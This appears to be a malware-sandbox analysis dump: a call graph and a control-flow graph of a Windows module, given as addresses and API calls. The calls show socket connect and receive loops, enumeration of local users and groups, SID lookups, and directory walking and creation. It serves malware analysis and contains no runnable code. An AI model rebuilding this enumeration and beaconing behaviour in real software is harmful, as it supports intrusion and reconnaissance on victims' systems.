7ffe0e16dcbf 47 API calls 60432->60456 60457 7ffe0e16ddf1 24 API calls 60433->60457 60439 7ffe0e16e45c 60434->60439 60440 7ffe0e16e478 60434->60440 60449 7ffe0e16db58 60437->60449 60438->60441 60454 7ffe0e16db66 183 API calls 60438->60454 60442 7ffe0e16e463 60439->60442 60443 7ffe0e16e4cc 60439->60443 60440->60441 60453 7ffe0e16df13 15 API calls 60440->60453 60441->60399 60442->60441 60452 7ffe0e16df93 34 API calls 60442->60452 60458 7ffe0e16de9a 18 API calls 60443->60458 60459 7ffe0e16db10 60449->60459 60452->60441 60453->60441 60454->60441 60455->60441 60456->60441 60457->60441 60458->60441 60466 7ffe0e16bceb 60459->60466 60462 7ffe0e16db31 60462->60441 60465 7ffe0e16bceb 2 API calls 60465->60462 60467 7ffe0e16bd01 QueryPerformanceFrequency QueryPerformanceCounter 60466->60467 60468 7ffe0e16bcf6 60466->60468 60467->60468 60468->60462 60469 7ffe0e166f2b 60468->60469 60504 7ffe0e166eed 60469->60504 60472 7ffe0e166f41 60474 7ffe0e166f4e 60472->60474 60513 7ffe0e168b2c 22 API calls 60472->60513 60473 7ffe0e16b930 8 API calls 60475 7ffe0e166f69 60473->60475 60474->60465 60476 7ffe0e16466b 8 API calls 60475->60476 60478 7ffe0e166f7e 60476->60478 60479 7ffe0e16702f 60478->60479 60480 7ffe0e166f88 strlen 60478->60480 60479->60472 60481 7ffe0e167037 strlen 60479->60481 60483 7ffe0e166fa5 60480->60483 60484 7ffe0e166fbe strlen 60480->60484 60485 7ffe0e167064 strlen 60481->60485 60486 7ffe0e16704e 60481->60486 60483->60484 60489 7ffe0e166faa strlen 60483->60489 60509 7ffe0e163714 10 API calls 60484->60509 60511 7ffe0e163714 10 API calls 60485->60511 60486->60485 60491 7ffe0e167053 strlen 60486->60491 60488 7ffe0e16710a 60497 7ffe0e167131 60488->60497 60514 7ffe0e168b47 GetProcessHeap HeapFree GetProcessHeap HeapFree LeaveCriticalSection 60488->60514 60515 7ffe0e1681b3 7 API calls 60488->60515 60489->60484 60491->60485 60493 7ffe0e167004 60493->60472 60510 7ffe0e164246 8 API calls 60493->60510 60495 7ffe0e1670b4 CompareFileTime 60495->60472 60500 7ffe0e1670cc 60495->60500 60496 7ffe0e1670a7 60496->60495 60499 7ffe0e1670ea 60496->60499 60497->60488 60516 7ffe0e168237 41 API calls 60497->60516 60517 7ffe0e167e40 19 API calls 60497->60517 60499->60472 60512 7ffe0e162c59 8 API calls 60500->60512 60501 7ffe0e16702d 60501->60479 60518 7ffe0e165dd0 60504->60518 60507 7ffe0e166efa 60507->60472 60507->60473 60509->60493 60510->60501 60511->60496 60512->60499 60513->60488 60514->60488 60515->60488 60516->60497 60517->60497 60519 7ffe0e165192 9 API calls 60518->60519 60520 7ffe0e165e13 60519->60520 60521 7ffe0e165e17 strlen 60520->60521 60529 7ffe0e165e60 60520->60529 60522 7ffe0e165e2d strcmp 60521->60522 60524 7ffe0e165e6e 60522->60524 60522->60529 60532 7ffe0e164246 8 API calls 60524->60532 60526 7ffe0e165e94 60527 7ffe0e165ea6 60526->60527 60526->60529 60533 7ffe0e163f67 8 API calls 60527->60533 60529->60507 60531 7ffe0e16b25e 27 API calls 60529->60531 60530 7ffe0e165eb0 60530->60529 60531->60507 60532->60526 60533->60530 60534 7ffe0e13135a 60539 7ffe0e131365 60534->60539 60535 7ffe0e13146e 60536 7ffe0e13147b 60535->60536 60601 7ffe0e1357a5 10 API calls 60535->60601 60539->60535 60540 7ffe0e13138d Sleep 60539->60540 60542 7ffe0e131442 Sleep 60539->60542 60543 7ffe0e1357a5 10 API calls 60539->60543 60545 7ffe0e13142e memcpy 60539->60545 60546 7ffe0e135a3c socket 60539->60546 60581 7ffe0e135eea 60539->60581 60592 7ffe0e131290 60539->60592 60540->60539 60542->60539 60543->60539 60545->60539 60547 7ffe0e135a73 60546->60547 60548 7ffe0e135c3b WSAGetLastError 60546->60548 60549 7ffe0e135a95 60547->60549 60550 7ffe0e135a77 60547->60550 60551 7ffe0e1340d2 6 API calls 60548->60551 60554 7ffe0e1356d9 8 API calls 60549->60554 60602 7ffe0e1356d9 60550->60602 60553 7ffe0e135c5f 60551->60553 60555 7ffe0e135c69 60553->60555 60567 7ffe0e135aaf 60553->60567 60557 7ffe0e135a93 60554->60557 60556 7ffe0e1340d2 6 API calls 60555->60556 60562 7ffe0e135ad0 60556->60562 60558 7ffe0e135aa7 60557->60558 60615 7ffe0e13580a setsockopt 60557->60615 60619 7ffe0e1357a5 10 API calls 60558->60619 60559 7ffe0e1340d2 6 API calls 60559->60562 60560 7ffe0e135aee 60560->60558 60565 7ffe0e135af3 htonl htons connect 60560->60565 60562->60539 60568 7ffe0e135b31 60565->60568 60569 7ffe0e135b4c WSAGetLastError 60565->60569 60567->60559 60572 7ffe0e1356d9 8 API calls 60568->60572 60570 7ffe0e135c0e WSAGetLastError 60569->60570 60571 7ffe0e135b5d 60569->60571 60574 7ffe0e1340d2 6 API calls 60570->60574 60571->60558 60573 7ffe0e135b65 select 60571->60573 60575 7ffe0e135b3e 60572->60575 60576 7ffe0e135bf0 60573->60576 60577 7ffe0e135bc6 60573->60577 60574->60558 60575->60553 60575->60558 60579 7ffe0e1340d2 6 API calls 60576->60579 60577->60568 60578 7ffe0e135bcc WSAGetLastError 60577->60578 60580 7ffe0e1340d2 6 API calls 60578->60580 60579->60558 60580->60558 60582 7ffe0e135f04 60581->60582 60583 7ffe0e135f78 60581->60583 60582->60583 60584 7ffe0e135f09 recv 60582->60584 60585 7ffe0e1340d2 6 API calls 60583->60585 60586 7ffe0e135f1f 60584->60586 60587 7ffe0e135f2c WSAGetLastError 60584->60587 60591 7ffe0e135f23 60585->60591 60590 7ffe0e1340d2 6 API calls 60586->60590 60586->60591 60588 7ffe0e135f40 60587->60588 60587->60591 60589 7ffe0e1340d2 6 API calls 60588->60589 60589->60591 60590->60591 60591->60539 60593 7ffe0e131352 60592->60593 60594 7ffe0e1312a8 60592->60594 60593->60539 60594->60593 60620 7ffe0e139395 60594->60620 60597 7ffe0e131344 LeaveCriticalSection 60597->60593 60598 7ffe0e1312d8 60598->60597 60599 7ffe0e1340d2 6 API calls 60598->60599 60623 7ffe0e13e1cc 60598->60623 60599->60598 60601->60536 60603 7ffe0e1356e9 ioctlsocket 60602->60603 60605 7ffe0e13570c 60603->60605 60606 7ffe0e13571d WSAGetLastError 60603->60606 60605->60560 60608 7ffe0e135624 setsockopt 60605->60608 60607 7ffe0e1340d2 6 API calls 60606->60607 60607->60605 60609 7ffe0e1356b4 WSAGetLastError 60608->60609 60610 7ffe0e135659 setsockopt 60608->60610 60611 7ffe0e1340d2 6 API calls 60609->60611 60612 7ffe0e13568f WSAGetLastError 60610->60612 60613 7ffe0e135685 60610->60613 60611->60613 60614 7ffe0e1340d2 6 API calls 60612->60614 60613->60557 60614->60613 60616 7ffe0e135851 WSAGetLastError 60615->60616 60617 7ffe0e135847 60615->60617 60618 7ffe0e1340d2 6 API calls 60616->60618 60617->60560 60618->60617 60619->60567 60621 7ffe0e1312bb EnterCriticalSection 60620->60621 60622 7ffe0e1393ab GetSystemTimeAsFileTime 60620->60622 60621->60598 60622->60621 60624 7ffe0e13e246 60623->60624 60625 7ffe0e13e1fc 60623->60625 60624->60598 60626 7ffe0e13e351 60625->60626 60627 7ffe0e13e20a 60625->60627 60675 7ffe0e13dad2 70 API calls 60626->60675 60629 7ffe0e13e210 60627->60629 60630 7ffe0e13e2be 60627->60630 60631 7ffe0e13e35f 60629->60631 60632 7ffe0e13e21b 60629->60632 60634 7ffe0e13e2c5 60630->60634 60635 7ffe0e13e306 60630->60635 60677 7ffe0e13df3e 56 API calls 60631->60677 60636 7ffe0e13e270 60632->60636 60637 7ffe0e13e21d 60632->60637 60633 7ffe0e13e294 60633->60624 60634->60624 60672 7ffe0e13d748 57 API calls 60634->60672 60638 7ffe0e13e30d 60635->60638 60639 7ffe0e13e34a 60635->60639 60644 7ffe0e13e358 60636->60644 60645 7ffe0e13e27b 60636->60645 60641 7ffe0e13e255 60637->60641 60642 7ffe0e13e224 60637->60642 60638->60624 60665 7ffe0e13d1db 60638->60665 60674 7ffe0e13d822 52 API calls 60639->60674 60641->60624 60669 7ffe0e13e0b6 16 API calls 60641->60669 60649 7ffe0e13e22f 60642->60649 60650 7ffe0e13e36d 60642->60650 60676 7ffe0e13dd0a 53 API calls 60644->60676 60646 7ffe0e13e2a3 60645->60646 60647 7ffe0e13e27d 60645->60647 60646->60624 60671 7ffe0e13de24 53 API calls 60646->60671 60653 7ffe0e13e288 60647->60653 60654 7ffe0e13e366 60647->60654 60655 7ffe0e13e31b 60649->60655 60656 7ffe0e13e23a 60649->60656 60679 7ffe0e13e146 16 API calls 60650->60679 60653->60624 60659 7ffe0e13e28f 60653->60659 60678 7ffe0e13dfe2 49 API calls 60654->60678 60673 7ffe0e13d1e9 18 API calls 60655->60673 60656->60624 60668 7ffe0e13d262 14 API calls 60656->60668 60670 7ffe0e13d8f6 57 API calls 60659->60670 60680 7ffe0e13d030 60665->60680 60668->60624 60669->60624 60670->60633 60671->60624 60672->60624 60673->60624 60674->60624 60675->60633 60676->60624 60677->60624 60678->60624 60679->60624 60707 7ffe0e131b9b 60680->60707 60685 7ffe0e13d080 60713 7ffe0e138f58 17 API calls 60685->60713 60686 7ffe0e13d087 60688 7ffe0e139395 GetSystemTimeAsFileTime 60686->60688 60691 7ffe0e13d09a 60688->60691 60689 7ffe0e13d1b8 60715 7ffe0e138f58 17 API calls 60689->60715 60691->60689 60693 7ffe0e13d0c6 strlen 60691->60693 60692 7ffe0e13d1bd 60695 7ffe0e131b9b 2 API calls 60692->60695 60697 7ffe0e13d05a 60692->60697 60694 7ffe0e1340d2 6 API calls 60693->60694 60696 7ffe0e13d0fe GetProcessHeap HeapAlloc 60694->60696 60695->60697 60698 7ffe0e13d120 60696->60698 60699 7ffe0e13d19d 60696->60699 60697->60624 60700 7ffe0e139395 GetSystemTimeAsFileTime 60698->60700 60701 7ffe0e1340d2 6 API calls 60699->60701 60702 7ffe0e13d14f strcpy 60700->60702 60703 7ffe0e13d1b3 60701->60703 60714 7ffe0e1314a2 13 API calls 60702->60714 60703->60689 60705 7ffe0e13d178 60705->60691 60706 7ffe0e13d181 GetProcessHeap HeapFree 60705->60706 60706->60691 60708 7ffe0e131bb1 QueryPerformanceFrequency QueryPerformanceCounter 60707->60708 60709 7ffe0e131ba6 60707->60709 60708->60709 60709->60697 60710 7ffe0e138f37 EnterCriticalSection 60709->60710 60716 7ffe0e137539 60710->60716 60713->60697 60714->60705 60715->60692 60717 7ffe0e137555 60716->60717 60720 7ffe0e137545 60716->60720 60722 7ffe0e13648f 60717->60722 60719 7ffe0e13754f 60719->60685 60719->60686 60720->60719 60743 7ffe0e136d5f 60720->60743 60765 7ffe0e1363af 8 API calls 60722->60765 60724 7ffe0e136ab2 60728 7ffe0e1340d2 6 API calls 60724->60728 60741 7ffe0e136abb 60724->60741 60725 7ffe0e1369ac NetLocalGroupEnum 60726 7ffe0e1364a4 60725->60726 60726->60724 60726->60725 60729 7ffe0e136a22 GetProcessHeap HeapAlloc 60726->60729 60732 7ffe0e136989 NetApiBufferFree 60726->60732 60727 7ffe0e136c09 60730 7ffe0e1340d2 6 API calls 60727->60730 60728->60741 60733 7ffe0e136a55 60729->60733 60734 7ffe0e1364b3 60729->60734 60735 7ffe0e136ae5 60730->60735 60732->60726 60737 7ffe0e136a90 60733->60737 60738 7ffe0e136a61 memcpy GetProcessHeap HeapFree 60733->60738 60734->60726 60739 7ffe0e1340d2 6 API calls 60734->60739 60735->60720 60736 7ffe0e136ac8 60740 7ffe0e1340d2 6 API calls 60736->60740 60737->60720 60738->60737 60739->60734 60740->60735 60741->60727 60742 7ffe0e136ac3 60741->60742 60766 7ffe0e1363af 8 API calls 60742->60766 60744 7ffe0e136c7f 8 API calls 60743->60744 60750 7ffe0e136d74 60744->60750 60745 7ffe0e1373c3 60747 7ffe0e137409 60745->60747 60748 7ffe0e1373cc 60745->60748 60746 7ffe0e1372a6 NetUserEnum 60746->60750 60749 7ffe0e1340d2 6 API calls 60747->60749 60751 7ffe0e13751a 60748->60751 60764 7ffe0e1373d4 60748->60764 60749->60764 60750->60745 60750->60746 60752 7ffe0e137283 NetApiBufferFree 60750->60752 60753 7ffe0e137322 GetProcessHeap HeapAlloc 60750->60753 60755 7ffe0e1340d2 6 API calls 60751->60755 60752->60750 60756 7ffe0e136d83 60753->60756 60757 7ffe0e13735c 60753->60757 60754 7ffe0e136c7f 8 API calls 60758 7ffe0e1373d9 60754->60758 60759 7ffe0e1373f6 60755->60759 60756->60750 60762 7ffe0e1340d2 6 API calls 60756->60762 60760 7ffe0e1373a1 60757->60760 60761 7ffe0e137368 memcpy GetProcessHeap HeapFree 60757->60761 60763 7ffe0e1340d2 6 API calls 60758->60763 60759->60719 60760->60719 60761->60760 60762->60756 60763->60759 60764->60754 60765->60726 60766->60736 60767 7ffe13383937 60778 7ffe13383941 60767->60778 60768 7ffe133839da EnterCriticalSection 60768->60778 60769 7ffe13383a27 EnterCriticalSection 60770 7ffe13383a34 60769->60770 60771 7ffe13383a40 WaitForSingleObject 60770->60771 60772 7ffe13383a8f LeaveCriticalSection 60770->60772 60777 7ffe13383a76 GetProcessHeap HeapFree 60770->60777 60774 7ffe13382785 11 API calls 60771->60774 60773 7ffe13383967 LeaveCriticalSection 60775 7ffe13383a1a Sleep SleepEx 60773->60775 60773->60778 60774->60770 60775->60769 60776 7ffe13382072 7 API calls 60779 7ffe13383994 WaitForSingleObject 60776->60779 60777->60770 60778->60768 60778->60769 60778->60773 60778->60776 60781 7ffe133839b9 GetProcessHeap HeapFree 60778->60781 60780 7ffe13382785 11 API calls 60779->60780 60780->60778 60781->60778 60782 7ffe0eb4135a 60791 7ffe0eb41365 60782->60791 60783 7ffe0eb4146e 60787 7ffe0eb4147b 60783->60787 60849 7ffe0eb41e65 10 API calls 60783->60849 60786 7ffe0eb4138d Sleep 60786->60791 60789 7ffe0eb41442 Sleep 60789->60791 60790 7ffe0eb41e65 10 API calls 60790->60791 60791->60783 60791->60786 60791->60789 60791->60790 60793 7ffe0eb4142e memcpy 60791->60793 60794 7ffe0eb420fc socket 60791->60794 60829 7ffe0eb425aa 60791->60829 60840 7ffe0eb41290 60791->60840 60793->60791 60795 7ffe0eb42133 60794->60795 60796 7ffe0eb422fb WSAGetLastError 60794->60796 60797 7ffe0eb42155 60795->60797 60798 7ffe0eb42137 60795->60798 60799 7ffe0eb49dc2 6 API calls 60796->60799 60802 7ffe0eb41d99 8 API calls 60797->60802 60850 7ffe0eb41d99 60798->60850 60801 7ffe0eb4231f 60799->60801 60804 7ffe0eb42329 60801->60804 60805 7ffe0eb4216f 60801->60805 60806 7ffe0eb42153 60802->60806 60809 7ffe0eb49dc2 6 API calls 60804->60809 60807 7ffe0eb49dc2 6 API calls 60805->60807 60825 7ffe0eb42167 60806->60825 60863 7ffe0eb41eca setsockopt 60806->60863 60811 7ffe0eb42190 60807->60811 60808 7ffe0eb421ae 60813 7ffe0eb421b3 htonl htons connect 60808->60813 60808->60825 60809->60811 60811->60791 60815 7ffe0eb421f1 60813->60815 60816 7ffe0eb4220c WSAGetLastError 60813->60816 60817 7ffe0eb41d99 8 API calls 60815->60817 60818 7ffe0eb422ce WSAGetLastError 60816->60818 60819 7ffe0eb4221d 60816->60819 60821 7ffe0eb421fe 60817->60821 60820 7ffe0eb49dc2 6 API calls 60818->60820 60822 7ffe0eb42225 select 60819->60822 60819->60825 60820->60825 60821->60801 60821->60825 60823 7ffe0eb422b0 60822->60823 60824 7ffe0eb42286 60822->60824 60827 7ffe0eb49dc2 6 API calls 60823->60827 60824->60815 60826 7ffe0eb4228c WSAGetLastError 60824->60826 60867 7ffe0eb41e65 10 API calls 60825->60867 60828 7ffe0eb49dc2 6 API calls 60826->60828 60827->60825 60828->60825 60830 7ffe0eb425c4 60829->60830 60831 7ffe0eb42638 60829->60831 60830->60831 60833 7ffe0eb425c9 recv 60830->60833 60832 7ffe0eb49dc2 6 API calls 60831->60832 60837 7ffe0eb425e3 60832->60837 60834 7ffe0eb425ec WSAGetLastError 60833->60834 60835 7ffe0eb425df 60833->60835 60836 7ffe0eb42600 60834->60836 60834->60837 60835->60837 60839 7ffe0eb49dc2 6 API calls 60835->60839 60838 7ffe0eb49dc2 6 API calls 60836->60838 60837->60791 60838->60837 60839->60837 60841 7ffe0eb41352 60840->60841 60842 7ffe0eb412a8 60840->60842 60841->60791 60842->60841 60868 7ffe0eb48e15 60842->60868 60845 7ffe0eb41344 LeaveCriticalSection 60845->60841 60846 7ffe0eb412d8 60846->60845 60847 7ffe0eb49dc2 6 API calls 60846->60847 60871 7ffe0eb49d36 60846->60871 60847->60846 60849->60787 60851 7ffe0eb41da9 ioctlsocket 60850->60851 60853 7ffe0eb41ddd WSAGetLastError 60851->60853 60854 7ffe0eb41dcc 60851->60854 60855 7ffe0eb49dc2 6 API calls 60853->60855 60854->60808 60856 7ffe0eb41ce4 setsockopt 60854->60856 60855->60854 60857 7ffe0eb41d74 WSAGetLastError 60856->60857 60858 7ffe0eb41d19 setsockopt 60856->60858 60861 7ffe0eb49dc2 6 API calls 60857->60861 60859 7ffe0eb41d4f WSAGetLastError 60858->60859 60860 7ffe0eb41d45 60858->60860 60862 7ffe0eb49dc2 6 API calls 60859->60862 60860->60806 60861->60860 60862->60860 60864 7ffe0eb41f11 WSAGetLastError 60863->60864 60865 7ffe0eb41f07 60863->60865 60866 7ffe0eb49dc2 6 API calls 60864->60866 60865->60808 60866->60865 60867->60805 60869 7ffe0eb412bb EnterCriticalSection 60868->60869 60870 7ffe0eb48e2b GetSystemTimeAsFileTime 60868->60870 60869->60846 60870->60869 60872 7ffe0eb49d62 60871->60872 60879 7ffe0eb49d81 60871->60879 60873 7ffe0eb49d9f 60872->60873 60874 7ffe0eb49d6c 60872->60874 60890 7ffe0eb499b3 23 API calls 60873->60890 60876 7ffe0eb49d6e 60874->60876 60880 7ffe0eb49d8a 60874->60880 60877 7ffe0eb49d75 60876->60877 60878 7ffe0eb49d98 60876->60878 60877->60879 60888 7ffe0eb49add 45 API calls 60877->60888 60889 7ffe0eb49760 25 API calls 60878->60889 60879->60846 60880->60879 60885 7ffe0eb49752 60880->60885 60883 7ffe0eb49d9d 60883->60879 60891 7ffe0eb49510 60885->60891 60888->60879 60889->60883 60890->60879 60920 7ffe0eb43f5b 60891->60920 60894 7ffe0eb44ac0 8 API calls 60895 7ffe0eb49586 60894->60895 60896 7ffe0eb489db 8 API calls 60895->60896 60897 7ffe0eb49598 60896->60897 60898 7ffe0eb495a2 strlen 60897->60898 60917 7ffe0eb49699 60897->60917 60899 7ffe0eb495cf strlen 60898->60899 60900 7ffe0eb495b9 60898->60900 60923 7ffe0eb482d7 60899->60923 60900->60899 60901 7ffe0eb495be strlen 60900->60901 60901->60899 60904 7ffe0eb4971b 60979 7ffe0eb45bd8 FindClose 60904->60979 60905 7ffe0eb49601 60906 7ffe0eb49609 strlen 60905->60906 60916 7ffe0eb49537 60905->60916 60910 7ffe0eb49620 60906->60910 60911 7ffe0eb49636 strcpy strlen strlen strlen 60906->60911 60910->60911 60913 7ffe0eb49625 strlen 60910->60913 60911->60917 60912 7ffe0eb49727 60914 7ffe0eb43f5b 2 API calls 60912->60914 60912->60916 60913->60911 60914->60916 60916->60879 60917->60904 60917->60916 60951 7ffe0eb45bf3 60917->60951 60976 7ffe0eb4542f 38 API calls 60917->60976 60977 7ffe0eb44e60 20 API calls 60917->60977 60978 7ffe0eb44fe9 66 API calls 60917->60978 60921 7ffe0eb43f71 QueryPerformanceFrequency QueryPerformanceCounter 60920->60921 60922 7ffe0eb43f66 60920->60922 60921->60922 60922->60894 60922->60916 60924 7ffe0eb482f5 60923->60924 60925 7ffe0eb482e0 GetFileAttributesA 60923->60925 60927 7ffe0eb49dc2 6 API calls 60924->60927 60926 7ffe0eb48325 GetLastError 60925->60926 60928 7ffe0eb482eb 60925->60928 60926->60928 60927->60928 60928->60905 60929 7ffe0eb45e9e 60928->60929 60930 7ffe0eb45ef8 60929->60930 60931 7ffe0eb45ebd strlen 60929->60931 60932 7ffe0eb49dc2 6 API calls 60930->60932 60933 7ffe0eb45ece 60931->60933 60948 7ffe0eb45ee9 60931->60948 60932->60948 60934 7ffe0eb45ed7 CreateDirectoryA 60933->60934 60935 7ffe0eb45f76 strcpy strlen 60933->60935 60936 7ffe0eb45f30 GetLastError 60934->60936 60934->60948 60937 7ffe0eb45fae strlen 60935->60937 60945 7ffe0eb45f55 60935->60945 60939 7ffe0eb49dc2 6 API calls 60936->60939 60937->60945 60938 7ffe0eb46160 60941 7ffe0eb49dc2 6 API calls 60938->60941 60939->60945 60940 7ffe0eb45f9d strlen 60940->60937 60943 7ffe0eb46112 60941->60943 60942 7ffe0eb460e9 60944 7ffe0eb49dc2 6 API calls 60942->60944 60943->60905 60944->60943 60945->60935 60945->60937 60945->60940 60946 7ffe0eb4601a CreateDirectoryA 60945->60946 60945->60948 60947 7ffe0eb46031 GetLastError 60946->60947 60949 7ffe0eb45fc5 60946->60949 60947->60949 60948->60938 60948->60942 60949->60945 60950 7ffe0eb49dc2 6 API calls 60949->60950 60950->60949 60952 7ffe0eb45c13 60951->60952 60970 7ffe0eb45c59 60951->60970 60953 7ffe0eb45cb2 60952->60953 60954 7ffe0eb45c1c 60952->60954 60956 7ffe0eb49dc2 6 API calls 60953->60956 60957 7ffe0eb45c25 60954->60957 60958 7ffe0eb45cea 60954->60958 60955 7ffe0eb49dc2 6 API calls 60975 7ffe0eb45ca3 60955->60975 60956->60975 60960 7ffe0eb45c31 FindNextFileA 60957->60960 60961 7ffe0eb45d22 FindFirstFileA 60957->60961 60959 7ffe0eb49dc2 6 API calls 60958->60959 60959->60975 60962 7ffe0eb45d72 GetLastError 60960->60962 60963 7ffe0eb45c47 60960->60963 60964 7ffe0eb45d43 GetLastError 60961->60964 60965 7ffe0eb45d36 60961->60965 60968 7ffe0eb45d9b 60962->60968 60973 7ffe0eb45d50 60962->60973 60966 7ffe0eb45c4c strcpy 60963->60966 60967 7ffe0eb45d57 60964->60967 60964->60973 60965->60966 60966->60970 60971 7ffe0eb49dc2 6 API calls 60967->60971 60969 7ffe0eb49dc2 6 API calls 60968->60969 60969->60973 60970->60955 60970->60975 60971->60973 60972 7ffe0eb45d8d FindClose 60972->60970 60973->60970 60973->60972 60974 7ffe0eb45db8 60973->60974 60974->60917 60975->60917 60976->60917 60977->60917 60978->60917 60979->60912

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 799 7ffe0e136da3-7ffe0e136db9 call 7ffe0e1340d2 802 7ffe0e13722a-7ffe0e13722e 799->802 803 7ffe0e136dbe 802->803 804 7ffe0e137234-7ffe0e137252 GetProcessHeap HeapAlloc 802->804 805 7ffe0e136dc3-7ffe0e136dc8 803->805 804->805 806 7ffe0e137258-7ffe0e13726e call 7ffe0e1340d2 804->806 808 7ffe0e136dce-7ffe0e136dde LocalAlloc 805->808 809 7ffe0e136eb4-7ffe0e136eb9 805->809 806->805 810 7ffe0e136de2-7ffe0e136de7 808->810 809->810 812 7ffe0e1371a5 810->812 813 7ffe0e136ded-7ffe0e136e6b wcsncpy call 7ffe0e1393ef LookupAccountNameW 810->813 815 7ffe0e1371aa-7ffe0e1371b5 812->815 819 7ffe0e136ebe-7ffe0e136eca GetLastError 813->819 820 7ffe0e136e6d-7ffe0e136e6f 813->820 817 7ffe0e137273 815->817 818 7ffe0e1371bb-7ffe0e1371bd 815->818 822 7ffe0e137279-7ffe0e137281 817->822 818->817 821 7ffe0e1371c3-7ffe0e137224 wcslen GetProcessHeap HeapAlloc 818->821 827 7ffe0e136ee1-7ffe0e136ef9 LocalAlloc 819->827 828 7ffe0e136ecc-7ffe0e136edf call 7ffe0e1340d2 819->828 825 7ffe0e137070-7ffe0e137088 ConvertSidToStringSidA 820->825 826 7ffe0e136e75-7ffe0e136e96 GetLastError call 7ffe0e1340d2 820->826 821->799 821->802 823 7ffe0e137283 NetApiBufferFree 822->823 824 7ffe0e137288-7ffe0e137298 822->824 823->824 829 7ffe0e13729e-7ffe0e1372a0 824->829 830 7ffe0e1373c3-7ffe0e1373ca 824->830 833 7ffe0e1370c1-7ffe0e1370e5 GetLastError call 7ffe0e1340d2 825->833 834 7ffe0e13708a-7ffe0e137091 825->834 849 7ffe0e1370e7-7ffe0e1370ed 826->849 850 7ffe0e136e9c 826->850 835 7ffe0e136eff-7ffe0e136f31 LookupAccountNameW 827->835 836 7ffe0e137066 827->836 828->826 829->830 837 7ffe0e1372a6-7ffe0e137310 NetUserEnum 829->837 844 7ffe0e137409-7ffe0e137422 call 7ffe0e1340d2 830->844 845 7ffe0e1373cc-7ffe0e1373ce 830->845 833->834 840 7ffe0e137097-7ffe0e1370bc call 7ffe0e1340d2 834->840 841 7ffe0e13716d-7ffe0e137172 834->841 842 7ffe0e136f41-7ffe0e136f62 GetLastError call 7ffe0e1340d2 835->842 843 7ffe0e136f33-7ffe0e136f3c LocalFree 835->843 836->825 837->822 848 7ffe0e137316-7ffe0e13731c 837->848 840->815 841->815 872 7ffe0e136f64 842->872 873 7ffe0e136f7c-7ffe0e136f82 842->873 843->820 868 7ffe0e137424 844->868 869 7ffe0e137443-7ffe0e137449 844->869 853 7ffe0e1373d4-7ffe0e1373f1 call 7ffe0e136c7f call 7ffe0e1340d2 845->853 854 7ffe0e13751a-7ffe0e137534 call 7ffe0e1340d2 845->854 848->822 857 7ffe0e137322-7ffe0e137356 GetProcessHeap HeapAlloc 848->857 864 7ffe0e1370f3-7ffe0e1370f9 849->864 865 7ffe0e13717b-7ffe0e137180 849->865 858 7ffe0e136ea2-7ffe0e136eaf 850->858 859 7ffe0e137166-7ffe0e13716b 850->859 876 7ffe0e1373f6-7ffe0e137408 853->876 854->876 870 7ffe0e136d83-7ffe0e136d9e call 7ffe0e1340d2 857->870 871 7ffe0e13735c-7ffe0e137366 857->871 858->843 859->815 866 7ffe0e137125-7ffe0e137128 864->866 867 7ffe0e1370fb-7ffe0e137101 864->867 865->815 881 7ffe0e13712a-7ffe0e13712d 866->881 882 7ffe0e13713b-7ffe0e137141 866->882 877 7ffe0e137197-7ffe0e13719c 867->877 878 7ffe0e137107-7ffe0e13710d 867->878 883 7ffe0e1374c8-7ffe0e1374cd 868->883 884 7ffe0e13742a-7ffe0e137437 868->884 885 7ffe0e13744f 869->885 886 7ffe0e1374d2 869->886 870->822 887 7ffe0e1373a1-7ffe0e1373be 871->887 888 7ffe0e137368-7ffe0e13739b memcpy GetProcessHeap HeapFree 871->888 890 7ffe0e137016-7ffe0e13701b 872->890 891 7ffe0e136f6a-7ffe0e136f77 872->891 879 7ffe0e136f88-7ffe0e136f8e 873->879 880 7ffe0e13702a-7ffe0e13702f 873->880 877->815 893 7ffe0e13719e-7ffe0e1371a3 878->893 894 7ffe0e137113-7ffe0e137119 878->894 895 7ffe0e136f90-7ffe0e136f93 879->895 896 7ffe0e136fc4-7ffe0e136fca 879->896 880->843 897 7ffe0e13712f-7ffe0e137132 881->897 898 7ffe0e137182-7ffe0e137187 881->898 899 7ffe0e137190-7ffe0e137195 882->899 900 7ffe0e137143-7ffe0e137148 882->900 883->853 884->869 901 7ffe0e137451-7ffe0e137457 885->901 902 7ffe0e13747f-7ffe0e137482 885->902 904 7ffe0e1374dc-7ffe0e1374e1 886->904 888->887 890->843 891->873 893->815 905 7ffe0e13714a-7ffe0e13714f 894->905 906 7ffe0e13711b-7ffe0e137120 894->906 907 7ffe0e136fae-7ffe0e136fb4 895->907 908 7ffe0e136f95-7ffe0e136f98 895->908 911 7ffe0e136fd0-7ffe0e136fd6 896->911 912 7ffe0e137052-7ffe0e137057 896->912 909 7ffe0e137134-7ffe0e137139 897->909 910 7ffe0e137189-7ffe0e13718e 897->910 898->815 899->815 900->815 913 7ffe0e13745d-7ffe0e137463 901->913 914 7ffe0e1374fa-7ffe0e1374ff 901->914 915 7ffe0e137484-7ffe0e137487 902->915 916 7ffe0e137498-7ffe0e13749e 902->916 904->853 905->815 906->815 921 7ffe0e137048-7ffe0e13704d 907->921 922 7ffe0e136fba-7ffe0e136fbf 907->922 919 7ffe0e136f9e-7ffe0e136fa1 908->919 920 7ffe0e137034-7ffe0e137039 908->920 909->815 910->815 923 7ffe0e13705c-7ffe0e137061 911->923 924 7ffe0e136fdc-7ffe0e136fe2 911->924 912->843 925 7ffe0e137504-7ffe0e137509 913->925 926 7ffe0e137469-7ffe0e13746f 913->926 914->853 915->904 927 7ffe0e137489-7ffe0e13748c 915->927 917 7ffe0e1374f0 916->917 918 7ffe0e1374a0-7ffe0e1374a5 916->918 917->914 918->853 930 7ffe0e13703e-7ffe0e137043 919->930 931 7ffe0e136fa7-7ffe0e136fac 919->931 920->843 921->843 922->843 923->843 932 7ffe0e136fee-7ffe0e136ff3 924->932 933 7ffe0e136fe4-7ffe0e136fe9 924->933 925->853 934 7ffe0e13750e-7ffe0e137513 926->934 935 7ffe0e137475-7ffe0e13747a 926->935 928 7ffe0e13748e-7ffe0e137493 927->928 929 7ffe0e1374e6-7ffe0e1374eb 927->929 928->853 929->853 930->843 931->843 932->843 933->843 934->853 935->853
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true
    • Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
    • Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
